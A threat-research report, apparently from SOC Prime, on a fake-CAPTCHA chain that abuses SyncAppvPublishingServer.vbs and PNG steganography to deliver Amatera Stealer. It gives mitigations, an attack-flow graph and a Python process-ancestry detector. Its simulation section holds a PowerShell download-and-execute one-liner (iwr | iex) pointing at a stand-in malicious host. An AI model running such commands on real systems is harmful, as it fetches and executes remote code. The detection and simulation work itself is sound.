SOC Prime Bias: Medium

02 Feb 2026 14:10

Novel Fake CAPTCHA Chain Delivers AMATERA Stealer

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report describes a multi-stage campaign that starts with a fake CAPTCHA lure and abuses a signed Microsoft App-V script as a LOLBin to proxy PowerShell. It pulls configuration from a public Google Calendar, extracts an encrypted payload hidden in PNG images via LSB steganography, and delivers the Amatera Stealer. Most steps run in memory to limit file artifacts. The final stage reaches a hard-coded C2 over TLS with Host-header spoofing.

Investigation

Researchers observed wscript.exe running SyncAppvPublishingServer.vbs to start PowerShell, then using dynamic alias and cmdlet resolution to conceal commands. A custom HTTPS client built on TcpClient and SslStream fetched a Google Calendar .ics file carrying base64 configuration. The loader generated a victim-specific subdomain, downloaded PNGs from CDN hosts, extracted embedded data via LSB steganography, decrypted it with an XOR key, and launched shellcode to load Amatera Stealer. The stealer establishes encrypted C2 using low-level Windows syscalls for stealth.

Mitigation

Block SyncAppvPublishingServer.vbs execution and remove App-V where it is not needed. Also monitor for calendar .ics fetches from unexpected processes. Restrict the Windows Run dialog via Group Policy and brief users on fake CAPTCHA prompts. Enable PowerShell logging, watch for alias-heavy or wildcard patterns, and flag wscript.exe→PowerShell ancestry. Detect outbound sessions where the Host header does not match the destination IP.

Response

If a suspicious Run command appears, alert on wscript.exe launching SyncAppvPublishingServer.vbs and correlate with PowerShell that uses indirect alias resolution or custom TLS routines. If PNG downloads from CDN domains are followed by in-memory decoding, contain and isolate the endpoint. Capture memory to identify Amatera shellcode and block the hard-coded C2 IP address 212.34.138.4.

Attack Flow

    graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef malware fill:#ff9999
    classDef tool fill:#cccccc
    %% Nodes
    attack_user_execution["<b>Action</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/>Adversary tricks victim into copying and pasting a malicious command via the Run dialog.<br/>User executes fake CAPTCHA command."]
    class attack_user_execution action
    action_vbscript_proxy["<b>Action</b> – <b>T1216.002 System Script Proxy Execution</b><br/>Signed VBScript (SyncAppvPublishingServer.vbs) is run through wscript.exe to proxy malicious behavior."]
    class action_vbscript_proxy action
    action_powershell_loader["<b>Action</b> – <b>T1059.001 PowerShell</b><br/>PowerShell loader is invoked indirectly to prepare the next stages."]
    class action_powershell_loader action
    action_network_proxy["<b>Action</b> – <b>T1571 Non-Standard Port</b>, <b>T1090.004 Proxy: Domain Fronting</b>, <b>T1572 Protocol Tunneling</b><br/>Dynamic alias/wildcard reconstruction and custom HTTPS over .NET sockets hide traffic on unusual ports."]
    class action_network_proxy action
    action_config_fetch["<b>Action</b> – <b>T1202 Indirect Command Execution</b>, <b>T1674 Input Injection</b><br/>Configuration is fetched from a public Google Calendar (.ics) file, using the calendar service as an indirect command channel."]
    class action_config_fetch action
    action_clipboard_gate["<b>Action</b> – <b>T1620 Reflective Code Loading</b><br/>Clipboard token verification is used as a gating condition before loading further code in memory."]
    class action_clipboard_gate action
    action_in_memory_assembly["<b>Action</b> – <b>T1027.003 Steganography</b><br/>Base64 fragments are assembled in memory into a PowerShell ScriptBlock, hiding the payload within seemingly benign data."]
    class action_in_memory_assembly action
    action_png_stego["<b>Action</b> – <b>T1027.008 Stripped Payloads</b>, <b>T1027.002 Software Packing</b>, <b>T1027.004 Compile After Delivery</b>, <b>T1027.017 SVG Smuggling</b><br/>A PNG image from a CDN is retrieved; LSB data is extracted and XOR-decrypted to reveal a hidden payload."]
    class action_png_stego action
    action_decompressed_payload["<b>Action</b> – <b>T1059.003 Windows Command Shell</b><br/>Decompressed PowerShell payload is executed in memory via cmd.exe (Win32_Process.Create)."]
    class action_decompressed_payload action
    action_shellcode_loader["<b>Action</b> – <b>T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</b><br/>Native shellcode loader allocates memory with NtAllocateVirtualMemory and prepares encrypted exfiltration channel."]
    class action_shellcode_loader action
    malware_amatera_stealer["<b>Malware</b> – <b>T1555.003 Credentials from Web Browsers</b>, <b>T1217 Browser Information Discovery</b><br/>Amatera Stealer payload is loaded, contacts C2 at IP 212.34.138.4 with a spoofed Host header, and harvests browser data and saved passwords."]
    class malware_amatera_stealer malware
    %% Connections
    attack_user_execution -->|leads to| action_vbscript_proxy
    action_vbscript_proxy -->|triggers| action_powershell_loader
    action_powershell_loader -->|uses| action_network_proxy
    action_network_proxy -->|retrieves| action_config_fetch
    action_config_fetch -->|gates| action_clipboard_gate
    action_clipboard_gate -->|enables| action_in_memory_assembly
    action_in_memory_assembly -->|creates| action_png_stego
    action_png_stego -->|executes| action_decompressed_payload
    action_decompressed_payload -->|loads| action_shellcode_loader
    action_shellcode_loader -->|delivers| malware_amatera_stealer

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

  • Attack Narrative & Commands:
    An adversary obtains a foothold on a Windows endpoint and wishes to download and execute a malicious payload while evading simple command-line detection. They craft a one-liner that relies heavily on PowerShell aliases (iwr for Invoke-WebRequest, iex for Invoke-Expression) and wildcard patterns to mask the true intent. The command dynamically builds a script block via ScriptBlock.Create, then executes it with Invoke-Expression. Because the rule looks for the keywords alias-heavy, Invoke-Expression, Invoke-RestMethod, and ScriptBlock.Create in the process command line, this technique is expected to trigger the detection.

  • Regression Test Script:

    # -------------------------------------------------
    # Alias-Heavy, Wildcard-Based PowerShell Attack Demo
    # -------------------------------------------------
    # Step 1: Assemble the script text from aliases (iwr, iex). A single-quoted
    #         here-string keeps $url literal, so it is assigned when the block runs
    #         rather than expanded (to nothing) while $payload is being built.
    #         The closing '@ must start at column 0 when pasted into a shell.
    $payload = @'
    $url = 'https://malicious.example.com/payload.ps1'
    iwr $url -UseBasicParsing | iex
    '@

    # Step 2: Create the script block via ScriptBlock.Create (flagged keyword)
    $sb = [ScriptBlock]::Create($payload)

    # Step 3: Execute the script block using Invoke-Expression (flagged keyword)
    Invoke-Expression $sb
  • Cleanup Commands:

    # Remove the downloaded payload if it was saved locally
    Remove-Item -Path "$env:TEMP\payload.ps1" -ErrorAction SilentlyContinue

    # Stop PowerShell processes started by the test in the last 5 minutes,
    # skipping the current session ($PID) so the cleanup does not kill itself
    Get-Process -Name powershell -ErrorAction SilentlyContinue | Where-Object {
        $_.Id -ne $PID -and $_.StartTime -gt (Get-Date).AddMinutes(-5)
    } | Stop-Process -Force
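As an added example (not SOC Prime's rule or code), the checks from the Mitigation and Response sections and the keyword rule exercised by the regression test above, run over constructed Sysmon-style process-creation records: PowerShell is flagged when its ancestry includes wscript.exe running SyncAppvPublishingServer.vbs, and its command line is scored for the rule's keywords, alias density and wildcard cmdlet lookups. Field names, pids and the placeholder.invalid URL are assumptions.

```python
import re
# Constructed Sysmon-style process-creation records (not real telemetry): a benign
# admin PowerShell plus the wscript.exe -> App-V script -> PowerShell chain above.
SAMPLE_EVENTS = [
    {"pid": 10, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 20, "ppid": 10, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n; iwr https://placeholder.invalid/p | iex"'},
    {"pid": 30, "ppid": 20, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden $sb=[ScriptBlock]::Create($p); iex $sb; &(gcm i*r-w*) $u | iex"},
    {"pid": 40, "ppid": 10, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]
KEYWORDS = {  # rule keywords from the text, plus wildcard cmdlet lookups such as gcm i*x
    "Invoke-Expression": re.compile(r"(?i)invoke-expression"),
    "Invoke-RestMethod": re.compile(r"(?i)invoke-restmethod"),
    "ScriptBlock.Create": re.compile(r"(?i)scriptblock\]?(::|\.)create"),
    "wildcard cmdlet lookup": re.compile(r"(?i)\b(gcm|get-command|gal|get-alias)\s+[\w-]*[*?][\w*?-]*"),
}
ALIASES = re.compile(r"(?i)(?<![\w-])(iwr|iex|irm|sal|gal|gcm)(?![\w-])")
APPV_PROXY = re.compile(r"(?i)syncappvpublishingserver\.vbs")

def powershell_indicators(cmd):
    """Return the rule keywords found in one PowerShell command line."""
    hits = [name for name, rx in KEYWORDS.items() if rx.search(cmd)]
    if len(ALIASES.findall(cmd)) >= 2:  # two or more short aliases counts as alias-heavy
        hits.append("alias-heavy")
    return hits

def ancestry(events, pid):
    """Follow ppid links from pid up to the root, guarding against cycles."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain

def detect(events):
    """Flag PowerShell processes with App-V script proxy ancestry or rule keywords."""
    findings = []
    for e in [x for x in events if x["image"].lower().endswith(("powershell.exe", "pwsh.exe"))]:
        reasons = powershell_indicators(e["cmd"])
        for anc in ancestry(events, e["ppid"]):
            if anc["image"].lower().endswith(("wscript.exe", "cscript.exe")) and APPV_PROXY.search(anc["cmd"]):
                reasons.insert(0, "T1216.002 App-V script proxy ancestry")
                break
        if reasons:
            findings.append({"pid": e["pid"], "reasons": reasons})
    return findings
```

The benign inventory script (pid 40) produces no finding, while the proxied child (pid 30) is reported with the ancestry reason first, followed by each matched keyword.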